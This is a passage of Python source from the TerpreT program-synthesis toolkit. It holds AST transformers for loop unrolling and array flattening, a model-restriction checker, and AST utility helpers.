return node
def visit_For(self, node):
# Find start and end node of iteration range.
iter_args = [eval_const_expressions(self.visit(arg)) for arg in node.iter.args]
(i_start, i_end, i_step) = (0, None, 1)
def as_int(num):
check_type(num, ast.Num)
return num.n
if len(iter_args) == 1:
i_end = as_int(iter_args[0])
elif len(iter_args) == 2:
i_start = as_int(iter_args[0])
i_end = as_int(iter_args[1])
elif len(iter_args) == 3:
i_start = as_int(iter_args[0])
i_end = as_int(iter_args[1])
i_step = as_int(iter_args[2])
else:
raise RuntimeError("Unhandled number of args in for loop.")
body = []
for i in range(i_start, i_end, i_step):
# Perform loop unrolling in the cloned loop body. Note
# that we _must_ perform unrolling separately for each
# clone of the loop body, because inner loops may use
# the loop counter in their loop bounds. We will not
# be able to unroll these inner loops before we unroll
# this one.
# Substitute the value of the loop counter into the
# cloned loop body.
self.__environment[node.target.id] = ast.copy_location(ast.Num(n=i), node)
new_node = copy.deepcopy(node)
self.generic_visit(new_node)
update_variable_domains(variable_domains, new_node.body)
body += new_node.body
return body
def visit_With(self, node):
context_expr = self.visit(node.context_expr)
result = if_node = ast.copy_location(ast.If(), node)
variable_domain = get_variable_domain(context_expr)
for i_value in range(0, variable_domain):
# Create the test (context_expr == i_value).
eq_node = ast.copy_location(ast.Eq(), node)
value_node = ast.copy_location(ast.Num(n=i_value), node)
if_node.test = ast.copy_location(ast.Compare(context_expr, [eq_node], [value_node]), node)
# Substitute the current value of the context
# expression into the body of the with. If the with
# binds a name, substitute uses of that
# name. Otherwise, substitute uses of the context
# expression.
if node.optional_vars is not None:
check_type(node.optional_vars, ast.Name)
replacements = {node.optional_vars.id : i_value}
if_node.body = eval_const_expressions(subs(node, **replacements)).body
else:
if isinstance(context_expr, ast.Name):
replacements = {context_expr.id : i_value}
if_node.body = eval_const_expressions(subs(node, **replacements)).body
elif isinstance(context_expr, ast.Subscript):
replacements = {subscript_to_tuple(context_expr) : ast.copy_location(ast.Num(n=i_value), node)}
if_node.body = eval_const_expressions(sub_subscript(node, replacements)).body
else:
error.fatal_error('Unexpected expression in with.', context_expr)
update_variable_domains(variable_domains, if_node.body)
# Recursively process withs inside the body. This must
# be performed separately for each body, because withs
# inside the body may depend on the current value of
# the context expression.
self.generic_visit(if_node)
# If this is not the last iteration of the loop,
# generate a new if node and add it to the else block
# of the current if. We will use the new if node in
# the next iteration.
if i_value < variable_domain-1:
if_node.orelse = [ast.copy_location(ast.If(), node)]
if_node = if_node.orelse[0]
else:
if_node.orelse = []
if variable_domain == 0:
result = []
return result
root = copy.deepcopy(root)
return Transformer().visit(root)
def subscript_to_tuple(subscript):
'''Convert a subscripted name of the form Name[(i1, ..., in)] to a
tuple ('Name', i1, ..., in).
'''
def err():
raise ValueError('Unexpected kind of slice: {}'.format(astunparse.unparse(subscript)))
# Get subscript name.
if isinstance(subscript.value, ast.Name):
name = subscript.value.id
else:
err()
# Get indices.
if isinstance(subscript.slice, ast.Index):
if isinstance(subscript.slice.value, ast.Num):
indices = [subscript.slice.value]
elif isinstance(subscript.slice.value, ast.Tuple):
indices = subscript.slice.value.elts
else:
err()
else:
err()
# Convert indices to python numbers.
int_indices = []
for i in indices:
if isinstance(i, ast.Num):
int_indices.append(i.n)
else:
err()
return tuple([name] + int_indices)
def sub_subscript(root, subs):
root = copy.deepcopy(root)
class Transformer(ast.NodeTransformer):
def visit_FunctionDef(self, node):
return node
def visit_Subscript(self, node):
self.generic_visit(node)
try:
node_tup = subscript_to_tuple(node)
if node_tup in subs:
return subs[node_tup]
else:
return node
except ValueError:
return node
return Transformer().visit(root)
def slice_node_to_tuple_of_numbers(slice_node):
if isinstance(slice_node.value, ast.Tuple):
indices = (elt for elt in slice_node.value.elts)
else:
indices = (slice_node.value,)
indices = list(indices)
for index in indices:
if not(isinstance(index, ast.Num)):
error.fatal_error("Trying to use non-constant value '%s' as array index." % (astunparse.unparse(index).rstrip()), index)
# Convert to python numbers
indices = (index.n for index in indices)
return indices
def flattened_array_name(array_name, indices):
return array_name + "_" + '_'.join([str(i) for i in indices])
def flatten_array_declarations(root):
class Transformer(ast.NodeTransformer):
def visit_FunctionDef(self, node):
return node
def visit_Assign(self, node):
if isinstance(node.value, ast.Subscript) and isinstance(node.value.value, ast.Call):
subscr = node.value
call = subscr.value
if len(node.targets) > 1:
error.error('Cannot use multiple assignment in array declaration.', node)
variable_name = node.targets[0].id
value_type = call.func.id
declaration_args = call.args
# Get the indices being accessed.
shape = slice_node_to_tuple_of_numbers(subscr.slice)
new_assigns = []
for indices in itertools.product(*[range(n) for n in shape]):
index_name = flattened_array_name(variable_name, indices)
new_index_name_node = ast.copy_location(ast.Name(index_name, ast.Store()), node)
new_value_type_node = ast.copy_location(ast.Name(value_type, ast.Load()), node)
new_declaration_args = [copy.deepcopy(arg) for arg in declaration_args]
new_call_node = ast.copy_location(ast.Call(new_value_type_node, new_declaration_args, [], None, None), node)
new_assign = ast.Assign([new_index_name_node], new_call_node)
new_assign = ast.copy_location(new_assign, node)
new_assigns.append(new_assign)
return new_assigns
else:
return node
return Transformer().visit(root)
def flatten_array_lookups(root):
class Transformer(ast.NodeTransformer):
def visit_FunctionDef(self, node):
return node
def visit_Subscript(self, node):
self.generic_visit(node)
# Get the indices being accessed.
indices = slice_node_to_tuple_of_numbers(node.slice)
variable_name = node.value.id
index_name = flattened_array_name(variable_name, indices)
return ast.copy_location(ast.Name(index_name, node.ctx), node)
return Transformer().visit(root)
def compute_function_outputs(root):
def cart_prod(xss):
if len(xss) == 0: return []
xs = xss[0]
if len(xss) == 1: return [[x] for x in xs]
rest_prod = cart_prod(xss[1:])
return [[ele] + pprod for ele in xs for pprod in rest_prod]
#Extract all needed context statements:
defined_functions = {}
context_stmts = []
for node in root.body:
if isinstance(node, ast.Assign):
if isinstance(node.value, ast.Call) and node.value.func.id in ["Param", "Var", "Input", "Output"]:
pass
elif isinstance(node.value, ast.Name):
pass
else:
context_stmts.append(node)
if isinstance(node, ast.FunctionDef):
#Record the functions that we want to look at:
if len(node.decorator_list) == 1 and node.decorator_list[0].func.id == "Runtime":
decorator = node.decorator_list[0]
if len(decorator.args) == 2 and isinstance(decorator.args[0], ast.List) and all(isinstance(elt, ast.Num) for elt in decorator.args[0].elts) and isinstance(decorator.args[1], ast.Num):
defined_functions[node.name] = ([elt.n for elt in decorator.args[0].elts], decorator.args[1].n)
#We need to get rid of the annotation that we haven't defined...
node = copy.deepcopy(node)
node.decorator_list = []
context_stmts.append(node)
node = ast.Pass(lineno=0, col_offset=0)
#Evaluate each function on all allowed input/output pairs:
results = {}
for (func_name, (par_domains, res_domain)) in defined_functions.iteritems():
#Now prepare the code that we are going to evaluate:
func_name_node = ast.copy_location(ast.Name(id=func_name, ctx = ast.Load()), node)
stmts = []
args_to_var_name = {}
for args in cart_prod([range(d) for d in par_domains]):
arg_nodes = []
for arg in args:
arg_nodes.append(ast.copy_location(ast.Num(n=arg), node))
func_call = ast.copy_location(ast.Call(func_name_node, arg_nodes, [], None, None), node)
res_var_name = "res__%s__%s" % (func_name, "__".join(map(str, args)))
args_to_var_name[tuple(args)] = res_var_name
res_var_name_node = ast.copy_location(ast.Name(id=res_var_name, ctx=ast.Store()), node)
stmts.append(ast.copy_location(ast.Assign([res_var_name_node], func_call), node))
wrapped = ast.copy_location(ast.Module(body=context_stmts + stmts), node)
eval_globals = {}
eval(compile(wrapped, '<constructed>', 'exec'), eval_globals)
results[func_name] = {args: eval_globals[args_to_var_name[args]] for args in args_to_var_name.keys()}
return results
def check(root):
'''Checks unrolled program for correctness w.r.t. TerpreT restrictions.
These include SSA form (i.e., no code path sets the same value twice),
variable initialisation (all values are initialised, or an input),
'''
class CheckMessage(object):
def __init__(self, message, node = None):
self.message = message
self.node = node
def message_prefix(self):
return ""
def print(self):
if self.node != None and hasattr(self.node, "lineno"):
if hasattr(self.node, "col_offset"):
location_description = "In line %i, col %i: " % (self.node.lineno, self.node.col_offset)
else:
location_description = "In line %i: " % (self.node.lineno)
else:
location_description = ""
eprint("%s%s%s" % (self.message_prefix(), location_description, self.message))
class CheckError(CheckMessage):
def __init__(self, message, node = None):
super(CheckError, self).__init__(message, node)
def message_prefix(self):
return "Error: "
class CheckWarning(CheckMessage):
def __init__(self, message, node = None):
super(CheckWarning, self).__init__(message, node)
def message_prefix(self):
return "Warning: "
#Sadly, this can't implement ast.NodeVisitor, because we need more state (and control over that state)
#The implementation is a copy of the ast.NodeVisitor interface, extended to thread a state object through the recursion.
#In our case, this is a pair of the set of initialized variables and the set of used variables, whose updated form we return.
class TerpretChecker():
def __init__(self):
self.__var_domain = {} # name -> uint, where "foo" => 3 means 'foo can take values 0, 1, 2'; 0 means "variable is numeric constant"
self.__defined_functions = {}
self.__messages = []
self.__outputs = []
def __set_domain(self, node, var, dom):
if var in self.__var_domain:
self.__messages.append(CheckError("Trying to redeclare variable '%s'." % (var), node))
self.__var_domain[var] = dom
def __get_domain(self, node, var):
if not(var in self.__var_domain):
self.__messages.append(CheckError("Trying to use undeclared variable '%s'." % (var), node))
return 0
return self.__var_domain[var]
def __is_declared(self, var):
return var in self.__var_domain
def __get_domain_of_expr(self, node):
if isinstance(node, ast.Name):
return self.__get_domain(node, node.id)
elif isinstance(node, ast.Call):
(_, value_domain) = self.__defined_functions[node.func.id]
return value_domain
elif isinstance(node, ast.Num):
return node.n + 1 #And now all together: Zero-based counting is haaaaard.
else:
self.__messages.append(CheckError("Cannot determine domain of value '%s' used in assignment." % (astunparse.unparse(node).rstrip()), node))
return 0
def check_function_outputs(self):
functions_to_ins_to_outs = compute_function_outputs(root)
for (func_name, (par_domains, res_domain)) in self.__defined_functions.iteritems():
ins_to_outs = functions_to_ins_to_outs[func_name]
for args, output in ins_to_outs.iteritems():
if output < 0 or output >= res_domain:
self.__messages.append(CheckError("Function '%s' with domain [0..%i] returns out-of-bounds value '%i' for inputs %s." % (func_name, res_domain - 1, output, str(args)), root))
def visit(self, state, node):
"""Visit a node or a list of nodes."""
if isinstance(node, list):
node_list = node
else:
node_list = [node]
for node in node_list:
method = 'visit_' + node.__class__.__name__
visitor = getattr(self, method, self.generic_visit)
state = visitor(state, node)
return state
def visit_FunctionDef(self, state, node):
if len(node.decorator_list) == 1 and node.decorator_list[0].func.id == "Runtime":
decorator = node.decorator_list[0]
if len(decorator.args) == 2 and isinstance(decorator.args[0], ast.List) and all(isinstance(elt, ast.Num) for elt in decorator.args[0].elts) and isinstance(decorator.args[1], ast.Num):
if node.name in self.__defined_functions:
self.__messages.append(CheckError("Re-definition of @Runtime function '%s'." % (node.name), node))
self.__defined_functions[node.name] = ([elt.n for elt in decorator.args[0].elts], decorator.args[1].n)
else:
self.__messages.append(CheckError("@Runtime function '%s' has unknown parameter structure, should be ([NUM, ..., NUM], NUM)." % (node.name), node))
elif len(node.decorator_list) == 1 and node.decorator_list[0].func.id == "Inline":
pass #These are OK.
else:
self.__messages.append(CheckError("Cannot declare non-@Runtime function '%s'." % (node.name), node))
return state
def visit_Assign(self, state, assgn):
(parameters, initialised, used) = state
if len(assgn.targets) > 1:
self.__messages.append(CheckError("Cannot process tuple assignment in '%s'." % (astunparse.unparse(assgn).rstrip()), assgn))
target = assgn.targets[0]
value = assgn.value
if isinstance(target, ast.Name):
assignedVar = target.id
if isinstance(value, ast.Num):
if self.__is_declared(assignedVar):
self.__messages.append(CheckError("Trying to assign num literal '%i' to model variable '%s'." % (value.n, assignedVar), assgn))
elif isinstance(value, ast.Call) and isinstance(value.func, ast.Name):
if (value.func.id in ["Var", "Param", "Input", "Output"]):
if isinstance(value.args[0], ast.Num):
self.__set_domain(assgn, assignedVar, value.args[0].n)
else:
self.__messages.append(CheckError("Cannot declare variable/parameter with non-constant range '%s'." % (astunparse.unparse(value.func.args[0]).rstrip()), assgn))
if value.func.id == "Param":
return (parameters | {assignedVar}, initialised, used)
if value.func.id == "Input":
return (parameters, initialised | {assignedVar}, used)
if value.func.id in ["Output"]:
self.__outputs.append(assignedVar)
return (parameters, initialised, used | {assignedVar})
elif value.func.id in self.__defined_functions:
for argument in value.args:
(_, _, used) = self.visit((parameters, initialised, used), argument)
return (parameters, initialised | {assignedVar}, used)
else:
self.__messages.append(CheckError("Cannot assign unknown function to variable '%s'." % (assignedVar), assgn))
else:
if self.__is_declared(assignedVar):
self.__messages.append(CheckError("Trying to assign '%s' to model variable '%s'." % (astunparse.unparse(value).rstrip(), assignedVar), assgn))
else:
self.__messages.append(CheckError("Cannot assign value to non-variable '%s'." % (astunparse.unparse(target).rstrip()), assgn))
return state
def visit_Expr(self, state, expr):
return self.visit(state, expr.value)
def visit_Name(self, state, name):
(parameters, initialised, used) = state
if name.id not in initialised and name.id not in parameters:
self.__messages.append(CheckError("Use of potentially uninitialised variable '%s'." % (name.id), name))
return (parameters, initialised, used | {name.id})
def visit_Num(self, state, name):
return state
def visit_Call(self, state, call):
(parameters, initialised, used) = state
if isinstance(call.func, ast.Attribute):
func = call.func
func_name = func.attr
set_variable = func.value.id
if func_name in ["set_to_constant", "set_to"]:
#Check that the children are fine:
if len(call.args) != 1:
self.__messages.append(CheckError("'%s.%s' with more than one argument unsupported." % (set_variable, func_name), call))
value = call.args[0]
(_, _, val_used_vars) = self.visit(state, value)
if set_variable in initialised:
self.__messages.append(CheckError("Trying to reset value of variable '%s'." % (set_variable), call))
if set_variable in parameters:
self.__messages.append(CheckWarning("Setting value of parameter '%s'." % (set_variable), call))
domain = self.__get_domain(call, set_variable)
if isinstance(value, ast.Num) and (value.n < 0 or value.n >= domain):
self.__messages.append(CheckError("Trying to set variable '%s' (domain [0..%i]) to invalid value '%i'." % (set_variable, domain - 1, value.n), call))
else:
value_domain = self.__get_domain_of_expr(value)
if value_domain != domain:
if isinstance(value, ast.Num) and (value.n >= domain or value.n < 0):
self.__messages.append(CheckError("Trying to set variable '%s' (domain [0..%i]) to value '%s'." % (set_variable, domain - 1, astunparse.unparse(value).rstrip()), value))
elif not(isinstance(value, ast.Num)):
self.__messages.append(CheckError("Trying to set variable '%s' (domain [0..%i]) to value '%s' with different domain [0..%i]." % (set_variable, domain - 1, astunparse.unparse(value).rstrip(), value_domain - 1), value))
return (parameters, initialised | {set_variable}, val_used_vars)
elif func_name in ["set_as_input"]:
return (parameters, initialised | {set_variable}, used)
elif func_name in ["set_as_output"]:
return (parameters, initialised, used | {set_variable})
elif func_name == "observe_value":
#Check that the children are fine:
if len(call.args) != 1:
self.__messages.append(CheckError("'%s.%s' with more than one argument unsupported." % (set_variable, func_name), call))
(_, _, val_used_vars) = self.visit(state, call.args[0])
if set_variable not in initialised:
self.__messages.append(CheckError("Observation of potentially uninitialised variable '%s'." % (set_variable), call))
return (parameters, initialised, val_used_vars | {set_variable})
else:
self.__messages.append(CheckError("Unsupported call '%s'." % (astunparse.unparse(call).rstrip()), call))
else:
func_name = call.func.id
func_information = self.__defined_functions.get(func_name, None)
if func_information != None:
(par_domains, _) = func_information
used_vars = used
if len(call.args) != len(par_domains):
self.__messages.append(CheckError("Call to %i-ary function '%s' with %i arguments." % (len(par_domains), func_name, len(call.args)), call))
for idx in range(len(call.args)):
arg = call.args[idx]
(_, _, used_vars) = self.visit((parameters, initialised, used_vars), arg)
par_domain = par_domains[idx]
arg_domain = self.__get_domain_of_expr(arg)
if arg_domain != par_domain:
if isinstance(arg, ast.Num) and (arg.n >= par_domain or arg.n < 0):
self.__messages.append(CheckError("Parameter %i of function '%s' has domain [0..%i], but argument value '%s' is incompatible." % (idx + 1, func_name, par_domain - 1, astunparse.unparse(arg).rstrip()), arg))
elif not(isinstance(arg, ast.Num)):
self.__messages.append(CheckError("Parameter %i of function '%s' has domain [0..%i], but argument value '%s' has different domain [0..%i]." % (idx + 1, func_name, par_domain - 1, astunparse.unparse(arg).rstrip(), arg_domain - 1), arg))
return (parameters, initialised, used_vars)
else:
self.__messages.append(CheckError("Call to undefined functions '%s'." % (func_name), call))
def visit_If(self, state, node):
(parameters, initialised, used) = state
#Here we need to do a bit of work to "linearise" case-analysis if-elif-elif structures,
#to explore if all cases are covered (and to see if the else branch is ever hit)
#For this, we have a fairly restrictive test format:
def check_test(test):
if not(isinstance(test.ops[0], ast.Eq)):
self.__messages.append(CheckError("Tests can only use ==, not '%s'." % (astunparse.unparse(test.ops[0]).rstrip()), node))
if not(isinstance(test.left, ast.Name)):
self.__messages.append(CheckError("Tests have to have identifier, not '%s' as left operand." % (astunparse.unparse(test.left).rstrip()), node))
if len(test.comparators) != 1:
self.__messages.append(CheckError("Tests cannot have multiple comparators in test '%s'." % (astunparse.unparse(test).rstrip()), node))
if not(isinstance(test.comparators[0], ast.Num)):
self.__messages.append(CheckError("Tests have to have constant, not '%s' as right operand." % (astunparse.unparse(test.comparators[0]).rstrip()), node))
return (test.left.id, test.comparators[0].n)
(checked_var, checked_val) = check_test(node.test)
if checked_var not in initialised and checked_var not in parameters:
self.__messages.append(CheckError("Test uses potentially uninitialised variable '%s'." % (checked_var), node))
var_domain_to_check = set(range(0, self.__get_domain(node, checked_var)))
used.add(checked_var)
#Now walk the .orelse branches, visiting each body independently...
branch_inits = []
current_if = node
while True:
(branch_checked_var, branch_checked_val) = check_test(current_if.test)
if branch_checked_var != checked_var:
self.__messages.append(CheckError("Case-analysis branch tests refer to different variables '%s' and '%s'." % (checked_var, branch_checked_var), current_if))
if branch_checked_val not in var_domain_to_check:
self.__messages.append(CheckError("Testing for value '%i' of variable '%s', which is either out of domain or has already been handled." % (branch_checked_val, checked_var), current_if))
var_domain_to_check.discard(branch_checked_val)
(_, branch_init, used) = self.visit((parameters, initialised.copy(), used), current_if.body)
branch_inits.append(branch_init)
if len(current_if.orelse) == 0:
#We've reached the end:
break
elif len(current_if.orelse) > 1 or not(isinstance(current_if.orelse[0], ast.If)):
self.__messages.append(CheckError("Non-empty else branch of case analysis.", node))
break
else:
current_if = current_if.orelse[0]
#... and now check if the results make sense:
some_branches_init = branch_inits[0].copy()
all_branches_init = branch_inits[0].copy()
#If not all values were checked, the empty else block wouldn't do anything:
if len(var_domain_to_check) > 0:
all_branches_init = initialised.copy()
for i in range(1, len(branch_inits)):
some_branches_init = some_branches_init.union(branch_inits[i])
all_branches_init = all_branches_init.intersection(branch_inits[i])
not_all_inits = some_branches_init.difference(all_branches_init)
if len(not_all_inits) > 0:
self.__messages.append(CheckWarning("Variables '%s' only initialised in some branches of if-elif." % ("', '".join(sorted(not_all_inits))), node.lineno))
return (parameters, all_branches_init, used)
def visit_Module(self, state, node):
return self.visit(state, node.body)
def visit_ImportFrom(self, state, imp):
if imp.module is "dummy":
return state
return self.generic_visit(imp)
def generic_visit(self, state, node):
self.__messages.append(CheckError("AST node '%s' unsupported." % (astunparse.unparse(node).strip()), node))
def check(self, root):
try:
(parameters, initialised, used) = self.visit((set(), set(), set()), root)
unused = initialised - used
for id in self.__outputs:
if id not in initialised:
self.__messages.append(CheckError("Output variable '%s' not initialised." % (id)))
for id in unused:
self.__messages.append(CheckWarning("Variable '%s' initialised, but not used." % (id)))
self.check_function_outputs()
except Exception as e:
#Ignore if we found something
if any([message for message in self.__messages if isinstance(message, CheckError)]):
pass
else:
raise
if len(self.__messages) > 0:
for message in self.__messages:
message.print()
return False
return True
return TerpretChecker().check(root)
def count_nodes(node):
i = 0
for _ in ast.walk(node):
i += 1
return i
def print_increase(node_count, start_node_count, prev_node_count=None):
inc_start = float(node_count - start_node_count) / start_node_count
if prev_node_count:
inc_prev = float(node_count - prev_node_count) / prev_node_count
eprint('Code size increased {:.2f}x over initial, {:.2f}x over previous.'.format(inc_start, inc_prev))
else:
eprint('Code size increased {:.2f}x over initial.'.format(inc_start))
def unroll_and_flatten(root, do_checks=True, print_info=False):
count_start = count_nodes(root)
if print_info: eprint('Inlining assignments and unrolling for loops and with statements...', end='')
root = inline_assigns_and_unroll_fors_and_withs(root)
if print_info: eprint('done.')
count_unrolled = count_nodes(root)
if print_info: print_increase(count_unrolled, count_start, count_start)
if print_info: eprint('Partial evaluation of constant model components...', end='')
root = eval_const_expressions(root)
if print_info: eprint('done.')
count_branches = count_nodes(root)
if print_info: print_increase(count_branches, count_start, count_unrolled)
if print_info: eprint('Flattening declarations...', end='')
root = flatten_array_declarations(root)
if print_info: eprint('done.')
count_decls = count_nodes(root)
if print_info: print_increase(count_decls, count_start, count_branches)
if print_info: eprint('Flattening lookups...', end='')
root = flatten_array_lookups(root)
if print_info: eprint('done.')
count_lookups = count_nodes(root)
if print_info: print_increase(count_lookups, count_start, count_decls)
if do_checks:
check(root)
return root
```
#### File: TerpreT/lib/utils.py
```python
import ast
import json
import pdb
import os
from astunparse import unparse
def cast(node, node_type):
assert isinstance(node, node_type), "cast to %s failed %s" % (node_type, ast.dump(node))
return node
def get_index(subscript_node):
index_node = cast(subscript_node.slice, ast.Index)
return name_or_number(index_node.value)
def is_int_constant(name_node):
return isinstance(name_node, ast.Name)
def is_constant_definition(assign_node):
return is_int_constant(assign_node.targets[0]) and isinstance(assign_node.value, ast.Num)
def is_hyper_definition(assign_node):
return isinstance(assign_node.value, ast.Call) and \
isinstance(assign_node.value.func, ast.Name) and \
assign_node.value.func.id == "Hyper"
def replace_hypers(root, hypers):
'''
Replace all hyperparameters declared using Hyper() by given values.
'''
class Transformer(ast.NodeTransformer):
def visit_Assign(self_t, node):
if is_hyper_definition(node):
assert isinstance(node.targets[0], ast.Name), \
"Expecting identifier on LHS of hyper definition"
hyper_name = node.targets[0].id
value = hypers[hyper_name]
node.value = ast.copy_location(ast.Num(value), node)
return node
return Transformer().visit(root)
def is_param_definition(assign_node):
if not isinstance(assign_node.value, ast.Call): return False
if not isinstance(assign_node.value.func, ast.Name): return False
return assign_node.value.func.id == "Param"
def is_self_params_assignment(node):
if not isinstance(node.targets[0], ast.Attribute): return False
return node.targets[0].attr == "params"
def is_input_definition(assign_node):
if not isinstance(assign_node.value, ast.Call): return False
if not isinstance(assign_node.value.func, ast.Name): return False
return assign_node.value.func.id == "Input"
def is_output_definition(assign_node):
if not isinstance(assign_node.value, ast.Call): return False
if not isinstance(assign_node.value.func, ast.Name): return False
return assign_node.value.func.id == "Output"
def is_set_to_user_defined_function(node):
if not is_set_to(node): return False
call_node = node.value.args[0]
if not isinstance(call_node, ast.Call): return False
if isinstance(call_node.func, ast.Attribute): # might be tpt function_name
if isinstance(call_node.func.value, ast.Name):
if call_node.func.value.id == "tpt": return False
return True
def make_args_list(args):
return ast.arguments(args=args, vararg=None, kwarg=None, defaults=[])
def get_method_by_name(module_node, name):
class Visitor(ast.NodeVisitor):
def visit_Module(self, node):
self.result = None
self.generic_visit(node)
def visit_FunctionDef(self, node):
if node.name == name:
assert self.result is None, "More than one result in module"
self.result = node
v = Visitor()
v.visit(module_node)
return v.result
def get_class_node(module_node):
class Visitor(ast.NodeVisitor):
def visit_Module(self, node):
self.result = None
self.generic_visit(node)
def visit_ClassDef(self, node):
assert self.result is None, "More than one class in module"
self.result = node
v = Visitor()
v.visit(module_node)
return v.result
def is_param_declaration(node):
if not isinstance(node, ast.Assign): return False
if not isinstance(node.value, ast.Call): return False
if not isinstance(node.value.func, ast.Attribute): return False
if node.value.func.value.id != "tf": return False
if node.value.func.attr != "Variable": return False
return True
def is_param_softmax_assign(node):
if not isinstance(node, ast.Assign): return False
if not isinstance(node.value, ast.Call): return False
if not isinstance(node.value.func, ast.Attribute): return False
if node.value.func.value.id != "tpt": return False
if node.value.func.attr != "softmax": return False
return True
def is_var_definition(assign_node):
if not isinstance(assign_node.value, ast.Call): return False
if not isinstance(assign_node.value.func, ast.Name): return False
return assign_node.value.func.id == "Var"
def is_tpt_decl(assign_node):
if not isinstance(assign_node.value, ast.Call): return False
if not isinstance(assign_node.value.func, ast.Name): return False
return assign_node.value.func.id in ["Var", "Input", "Output", "Param"]
def param_size(assign_node):
assert is_param_definition(assign_node)
assert isinstance(assign_node.value.args[0], ast.Num)
return assign_node.value.args[0].n
def var_names_used_in_call(call_node):
results = []
for arg in call_node.args:
name_node = cast(arg, ast.Name)
results.append(name_node.id)
return results
def var_names_used_in_factor(name_or_call_node):
if isinstance(name_or_call_node, ast.Name):
return [name_or_call_node.id]
elif isinstance(name_or_call_node, ast.Call):
return var_names_used_in_call(name_or_call_node)
else:
assert False, "not name or call node " + ast.dump(name_or_call_node)
def var_names_used_in_set_to(set_to_node):
assert isinstance(set_to_node, ast.Expr), "set_to node should be Expr"
call_node = cast(set_to_node.value, ast.Call)
attribute_node = cast(call_node.func, ast.Attribute)
name_node = cast(attribute_node.value, ast.Name)
lhs_var = name_node.id
assert attribute_node.attr == "set_to", "expected set_to " + ast.dump(attribute_node)
rhs_vars = var_names_used_in_factor(call_node.args[0])
return [lhs_var] + rhs_vars
def name_or_number(name_or_num_node):
if isinstance(name_or_num_node, ast.Name):
return name_or_num_node.id
elif isinstance(name_or_num_node, ast.Num):
return name_or_num_node.n
else:
assert False, "not a name or number " + ast.dump(name_or_num_node)
def parse_factor_expression(call_or_name_node):
if isinstance(call_or_name_node, ast.Name): # a.set_to(b) is shorthand for a.set_to(Copy(b))
name_node = call_or_name_node
return None, [name_node.id]
elif isinstance(call_or_name_node, ast.Call): # a.set_to(f(b))
call_node = call_or_name_node
return call_node.func.id, [name_or_number(node) for node in call_node.args]
elif isinstance(call_or_name_node, ast.Num): # a.observe_value(0)
num_node = call_or_name_node
return None, [int(num_node.n)]
elif isinstance(call_or_name_node, ast.Subscript):
print ast.dump(call_or_name_node)
pdb.set_trace()
else:
assert False, "Can't parse factor " + ast.dump(call_or_name_node)
def parse_assign(assign_node):
var = assign_node.targets[0].id
factor = parse_factor_expression(assign_node.value)
return var, factor
def parse_declaration(assign_node):
if len(assign_node.targets) > 1: return False
if is_macro_definition(assign_node):
return None
var, factor = parse_assign(assign_node)
return var, factor
def if_and_or_else_blocks(if_node):
results = []
results.append(if_node)
if len(if_node.orelse) > 0:
results.extend(if_and_or_else_blocks(if_node.orelse[0])) # recurse on elif branches
return results
def parse_compare(compare_node):
assert len(compare_node.ops) == 1, "multiple comparison ops?" + ast.dump(compare_node)
assert isinstance(compare_node.ops[0], ast.Eq), "comparison should be ==" + \
ast.dump(compare_node.ops[0])
lhs = compare_node.left
rhs = compare_node.comparators[0]
if isinstance(lhs, ast.Name) and isinstance(rhs, ast.Num):
var_name = lhs.id
val = rhs.n
elif isinstance(rhs, ast.Name) and isinstance(lhs, ast.Num):
var_name = rhs.id
val = lhs.n
elif isinstance(rhs, ast.Name) and isinstance(lhs, ast.Name):
# try to apply macro
if is_int_constant(rhs):
var_name = lhs.id
val = rhs.id
elif is_int_constant(lhs):
var_name = rhs.id
val = lhs.id
else:
assert False, "Unable to apply macro to fix comparator " + ast.dump(compare_node)
else:
assert False, "unexpected comparator" + ast.dump(compare_node)
return var_name, val
def string_expr_to_ast(str):
return ast.parse(str).body[0].value
def string_expr_to_ast2(str):
return ast.parse(str).body[0]
def var_used_as_index(tree, var_id):
index_nodes = descendants_of_type(tree, ast.Index)
for index in index_nodes:
name_nodes = descendants_of_type(index, ast.Name)
for name in name_nodes:
if name.id == var_id: return True
return False
def get_single_lhs(node):
if not isinstance(node, ast.Assign): return None
lhs = node.targets
if len(lhs) != 1: return None
return lhs[0]
def descendants_of_type(root, nodetype):
result = []
if isinstance(root, nodetype):
result.append(root)
for ch in ast.iter_child_nodes(root):
ch_result = descendants_of_type(ch, nodetype)
result.extend(ch_result)
return result
def get_kwarg(call_node, kwarg):
assert isinstance(call_node, ast.Call)
for k in call_node.keywords:
if k.arg == kwarg:
return k.value
return None
def function_name(function_node):
if not isinstance(function_node, ast.FunctionDef): return None
return function_node.name
def function_nodes(root):
return descendants_of_type(root, ast.FunctionDef)
def return_nodes(root):
return descendants_of_type(root, ast.Return)
def rhs_function(node):
if not isinstance(node, ast.Assign): return None
rhs = node.value
if isinstance(rhs, ast.Call):
return rhs
elif isinstance(rhs, ast.BinOp):
return rhs
elif isinstance(rhs, ast.UnaryOp):
return rhs
elif isinstance(rhs, ast.Subscript):
return rhs
def is_einsum_function(node):
if isinstance(node, ast.Attribute):
return node.attr == "einsum"
elif isinstance(node, ast.Name):
return node.id == "einsum"
else:
return False
def is_numpy_log(node):
if isinstance(node, ast.Attribute):
return node.value.id == "np" and node.attr == "log"
else:
return False
def is_numpy_function(node, function_name):
if isinstance(node, ast.Attribute):
return node.value.id == "np" and node.attr == function_name
else:
return False
def is_numpy_constructor(node):
if isinstance(node, ast.Attribute):
return node.value.id == "np" and node.attr in ["rand", "randn", "zeros", "ones"]
else:
return False
def is_concatenate_function(node):
if isinstance(node, ast.Attribute):
return node.attr == "concatenate"
elif isinstance(node, ast.Name):
return node.id == "concatenate"
else:
return False
def is_add_function(node):
return isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add)
def is_registered(context, f):
if context is None: return False
def is_forward_function_call(call):
if not isinstance(call.func, ast.Name): return False
name = call.func.id
return name.endswith("_f")
def var_to_dvar(var_node):
if isinstance(var_node, ast.Name):
name = var_node
new_name = ast.Name()
new_id = "d%s" % name.id
new_name.id = new_id
return new_name
elif isinstance(var_node, ast.Subscript):
subscript = var_node
name = subscript.value
new_name = ast.Name(id="d%s" % name.id)
new_subscript = ast.Subscript(value=new_name, slice=subscript.slice)
return new_subscript
else:
print "Error: don't know how to dvar a %s" % ast.dump(var_node)
print r.pretty(var_node)
assert False
def f_to_df(call):
if isinstance(call.func, ast.Name):
new_name = ast.Name(id=call.func.id.replace("_f", "_b"))
else:
assert False
return new_name
def get_concatenate_axis(call):
keywords = call.keywords
for k in keywords:
if k.arg == "axis":
assert isinstance(k.value, ast.Num) # require axes be given as literals
return k.value.n
return 0
def make_unconcat_slice(axis, lower, upper):
dims = []
for i in range(axis):
dims.append(ast.Slice(lower=None, upper=None, step=None))
